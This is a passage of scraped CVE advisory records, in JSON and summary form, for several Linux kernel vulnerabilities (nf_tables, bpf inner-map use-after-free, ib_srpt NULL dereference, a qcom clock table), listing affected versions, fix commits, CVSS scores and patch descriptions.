"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "2aeb805a1bcd5f27c8c0d1a9d4d653f16d1506f4",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "9627fd0c6ea1c446741a33e67bc5709c59923827",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "7f609f630951b624348373cef99991ce08831927",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "1bc83a019bbe268be3526406245ec28c2458a518",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.262",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.202",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: discard table flag update with pending basechain deletion\n\nHook unregistration is deferred to the commit phase, same occurs with\nhook updates triggered by the table dormant flag. When both commands are\ncombined, this results in deleting a basechain while leaving its hook\nstill registered in the core."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:53.215Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e75faf01e22ec7dc671640fa0e0968964fafd2fc"
},
{
"url": "https://git.kernel.org/stable/c/9a3b90904d8a072287480eed4c3ece4b99d64f78"
},
{
"url": "https://git.kernel.org/stable/c/b58d0ac35f6d75ec1db8650a29dfd6f292c11362"
},
{
"url": "https://git.kernel.org/stable/c/6cbbe1ba76ee7e674a86abd43009b083a45838cb"
},
{
"url": "https://git.kernel.org/stable/c/2aeb805a1bcd5f27c8c0d1a9d4d653f16d1506f4"
},
{
"url": "https://git.kernel.org/stable/c/9627fd0c6ea1c446741a33e67bc5709c59923827"
},
{
"url": "https://git.kernel.org/stable/c/7f609f630951b624348373cef99991ce08831927"
},
{
"url": "https://git.kernel.org/stable/c/1bc83a019bbe268be3526406245ec28c2458a518"
}
],
"title": "netfilter: nf_tables: discard table flag update with pending basechain deletion",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35897",
"datePublished": "2024-05-19T08:34:51.799Z",
"dateReserved": "2024-05-17T13:50:33.114Z",
"dateUpdated": "2025-05-04T09:07:53.215Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52447 (GCVE-0-2023-52447)
Vulnerability from cvelistv5
Published
2024-02-22 16:21
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Defer the free of inner map when necessary
When updating or deleting an inner map in map array or map htab, the map
may still be accessed by non-sleepable program or sleepable program.
However bpf_map_fd_put_ptr() decreases the ref-counter of the inner map
directly through bpf_map_put(), if the ref-counter is the last one
(which is true for most cases), the inner map will be freed by
ops->map_free() in a kworker. But for now, most .map_free() callbacks
don't use synchronize_rcu() or its variants to wait for the elapse of a
RCU grace period, so after the invocation of ops->map_free completes,
the bpf program which is accessing the inner map may incur
use-after-free problem.
Fix the free of inner map by invoking bpf_map_free_deferred() after both
one RCU grace period and one tasks trace RCU grace period if the inner
map has been removed from the outer map before. The deferment is
accomplished by using call_rcu() or call_rcu_tasks_trace() when
releasing the last ref-counter of bpf map. The newly-added rcu_head
field in bpf_map shares the same storage space with work field to
reduce the size of bpf_map.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bba1dc0b55ac462d24ed1228ad49800c238cd6d7 Version: bba1dc0b55ac462d24ed1228ad49800c238cd6d7 Version: bba1dc0b55ac462d24ed1228ad49800c238cd6d7 Version: bba1dc0b55ac462d24ed1228ad49800c238cd6d7 Version: bba1dc0b55ac462d24ed1228ad49800c238cd6d7 Version: bba1dc0b55ac462d24ed1228ad49800c238cd6d7 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "90c445799fd1",
"status": "affected",
"version": "bba1dc0b55ac",
"versionType": "git"
},
{
"lessThan": "37d98fb9c314",
"status": "affected",
"version": "bba1dc0b55ac",
"versionType": "git"
},
{
"lessThan": "62fca83303d6",
"status": "affected",
"version": "bba1dc0b55ac",
"versionType": "git"
},
{
"lessThan": "f91cd728b10c",
"status": "affected",
"version": "bba1dc0b55ac",
"versionType": "git"
},
{
"lessThan": "bfd9b20c4862",
"status": "affected",
"version": "bba1dc0b55ac",
"versionType": "git"
},
{
"lessThan": "876673364161",
"status": "affected",
"version": "bba1dc0b55ac",
"versionType": "git"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.9:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.9"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "custom"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52447",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-15T21:02:24.907266Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-15T21:08:15.323Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.700Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/90c445799fd1dc214d7c6279c144e33a35e29ef2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/37d98fb9c3144c0fddf7f6e99aece9927ac8dce6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62fca83303d608ad4fec3f7428c8685680bb01b0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f91cd728b10c51f6d4a39957ccd56d1e802fc8ee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bfd9b20c4862f41d4590fde11d70a5eeae53dcc5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/876673364161da50eed6b472d746ef88242b2368"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/linux/bpf.h",
"kernel/bpf/map_in_map.c",
"kernel/bpf/syscall.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "90c445799fd1dc214d7c6279c144e33a35e29ef2",
"status": "affected",
"version": "bba1dc0b55ac462d24ed1228ad49800c238cd6d7",
"versionType": "git"
},
{
"lessThan": "37d98fb9c3144c0fddf7f6e99aece9927ac8dce6",
"status": "affected",
"version": "bba1dc0b55ac462d24ed1228ad49800c238cd6d7",
"versionType": "git"
},
{
"lessThan": "62fca83303d608ad4fec3f7428c8685680bb01b0",
"status": "affected",
"version": "bba1dc0b55ac462d24ed1228ad49800c238cd6d7",
"versionType": "git"
},
{
"lessThan": "f91cd728b10c51f6d4a39957ccd56d1e802fc8ee",
"status": "affected",
"version": "bba1dc0b55ac462d24ed1228ad49800c238cd6d7",
"versionType": "git"
},
{
"lessThan": "bfd9b20c4862f41d4590fde11d70a5eeae53dcc5",
"status": "affected",
"version": "bba1dc0b55ac462d24ed1228ad49800c238cd6d7",
"versionType": "git"
},
{
"lessThan": "876673364161da50eed6b472d746ef88242b2368",
"status": "affected",
"version": "bba1dc0b55ac462d24ed1228ad49800c238cd6d7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/linux/bpf.h",
"kernel/bpf/map_in_map.c",
"kernel/bpf/syscall.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Defer the free of inner map when necessary\n\nWhen updating or deleting an inner map in map array or map htab, the map\nmay still be accessed by non-sleepable program or sleepable program.\nHowever bpf_map_fd_put_ptr() decreases the ref-counter of the inner map\ndirectly through bpf_map_put(), if the ref-counter is the last one\n(which is true for most cases), the inner map will be freed by\nops-\u003emap_free() in a kworker. But for now, most .map_free() callbacks\ndon\u0027t use synchronize_rcu() or its variants to wait for the elapse of a\nRCU grace period, so after the invocation of ops-\u003emap_free completes,\nthe bpf program which is accessing the inner map may incur\nuse-after-free problem.\n\nFix the free of inner map by invoking bpf_map_free_deferred() after both\none RCU grace period and one tasks trace RCU grace period if the inner\nmap has been removed from the outer map before. The deferment is\naccomplished by using call_rcu() or call_rcu_tasks_trace() when\nreleasing the last ref-counter of bpf map. The newly-added rcu_head\nfield in bpf_map shares the same storage space with work field to\nreduce the size of bpf_map."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:44.024Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/90c445799fd1dc214d7c6279c144e33a35e29ef2"
},
{
"url": "https://git.kernel.org/stable/c/37d98fb9c3144c0fddf7f6e99aece9927ac8dce6"
},
{
"url": "https://git.kernel.org/stable/c/62fca83303d608ad4fec3f7428c8685680bb01b0"
},
{
"url": "https://git.kernel.org/stable/c/f91cd728b10c51f6d4a39957ccd56d1e802fc8ee"
},
{
"url": "https://git.kernel.org/stable/c/bfd9b20c4862f41d4590fde11d70a5eeae53dcc5"
},
{
"url": "https://git.kernel.org/stable/c/876673364161da50eed6b472d746ef88242b2368"
}
],
"title": "bpf: Defer the free of inner map when necessary",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52447",
"datePublished": "2024-02-22T16:21:39.032Z",
"dateReserved": "2024-02-20T12:30:33.292Z",
"dateUpdated": "2025-05-04T07:36:44.024Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26744 (GCVE-0-2024-26744)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/srpt: Support specifying the srpt_service_guid parameter
Make loading ib_srpt with this parameter set work. The current behavior is
that setting that parameter while loading the ib_srpt kernel module
triggers the following kernel crash:
BUG: kernel NULL pointer dereference, address: 0000000000000000
Call Trace:
<TASK>
parse_one+0x18c/0x1d0
parse_args+0xe1/0x230
load_module+0x8de/0xa60
init_module_from_file+0x8b/0xd0
idempotent_init_module+0x181/0x240
__x64_sys_finit_module+0x5a/0xb0
do_syscall_64+0x5f/0xe0
entry_SYSCALL_64_after_hwframe+0x6e/0x76
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26744",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T19:40:03.230655Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T21:08:27.208Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.022Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/84f1dac960cfa210a3b7a7522e6c2320ae91932b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a5c039dac1b1b7ba3e91c791f4421052bf79b82"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/989af2f29342a9a7c7515523d879b698ac8465f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aee4dcfe17219fe60f2821923adea98549060af8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fe2a73d57319feab4b3b175945671ce43492172f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c99a827d3cff9f84e1cb997b7cc6386d107aa74d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fdfa083549de5d50ebf7f6811f33757781e838c0"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/ulp/srpt/ib_srpt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "84f1dac960cfa210a3b7a7522e6c2320ae91932b",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "e0055d6461b36bfc25a9d2ab974eef78d36a6738",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "5a5c039dac1b1b7ba3e91c791f4421052bf79b82",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "989af2f29342a9a7c7515523d879b698ac8465f4",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "aee4dcfe17219fe60f2821923adea98549060af8",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "fe2a73d57319feab4b3b175945671ce43492172f",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "c99a827d3cff9f84e1cb997b7cc6386d107aa74d",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "fdfa083549de5d50ebf7f6811f33757781e838c0",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/ulp/srpt/ib_srpt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.3"
},
{
"lessThan": "3.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.293",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.293",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/srpt: Support specifying the srpt_service_guid parameter\n\nMake loading ib_srpt with this parameter set work. The current behavior is\nthat setting that parameter while loading the ib_srpt kernel module\ntriggers the following kernel crash:\n\nBUG: kernel NULL pointer dereference, address: 0000000000000000\nCall Trace:\n \u003cTASK\u003e\n parse_one+0x18c/0x1d0\n parse_args+0xe1/0x230\n load_module+0x8de/0xa60\n init_module_from_file+0x8b/0xd0\n idempotent_init_module+0x181/0x240\n __x64_sys_finit_module+0x5a/0xb0\n do_syscall_64+0x5f/0xe0\n entry_SYSCALL_64_after_hwframe+0x6e/0x76"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:30.832Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/84f1dac960cfa210a3b7a7522e6c2320ae91932b"
},
{
"url": "https://git.kernel.org/stable/c/e0055d6461b36bfc25a9d2ab974eef78d36a6738"
},
{
"url": "https://git.kernel.org/stable/c/5a5c039dac1b1b7ba3e91c791f4421052bf79b82"
},
{
"url": "https://git.kernel.org/stable/c/989af2f29342a9a7c7515523d879b698ac8465f4"
},
{
"url": "https://git.kernel.org/stable/c/aee4dcfe17219fe60f2821923adea98549060af8"
},
{
"url": "https://git.kernel.org/stable/c/fe2a73d57319feab4b3b175945671ce43492172f"
},
{
"url": "https://git.kernel.org/stable/c/c99a827d3cff9f84e1cb997b7cc6386d107aa74d"
},
{
"url": "https://git.kernel.org/stable/c/fdfa083549de5d50ebf7f6811f33757781e838c0"
}
],
"title": "RDMA/srpt: Support specifying the srpt_service_guid parameter",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26744",
"datePublished": "2024-04-03T17:00:33.280Z",
"dateReserved": "2024-02-19T14:20:24.168Z",
"dateUpdated": "2025-05-04T08:55:30.832Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26970 (GCVE-0-2024-26970)
Vulnerability from cvelistv5
Published
2024-05-01 05:19
Modified
2025-05-04 09:01
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
clk: qcom: gcc-ipq6018: fix terminating of frequency table arrays
The frequency table arrays are supposed to be terminated with an
empty element. Add such entry to the end of the arrays where it
is missing in order to avoid possible out-of-bound access when
the table is traversed by functions like qcom_find_freq() or
qcom_find_freq_floor().
Only compile tested.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d9db07f088af01a1080d01de363141b673c7d646 Version: d9db07f088af01a1080d01de363141b673c7d646 Version: d9db07f088af01a1080d01de363141b673c7d646 Version: d9db07f088af01a1080d01de363141b673c7d646 Version: d9db07f088af01a1080d01de363141b673c7d646 Version: d9db07f088af01a1080d01de363141b673c7d646 Version: d9db07f088af01a1080d01de363141b673c7d646 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "ae60e3342296",
"status": "affected",
"version": "d9db07f088af",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "b4527ee3de36",
"status": "affected",
"version": "d9db07f088af",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "852db52b45ea",
"status": "affected",
"version": "d9db07f088af",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
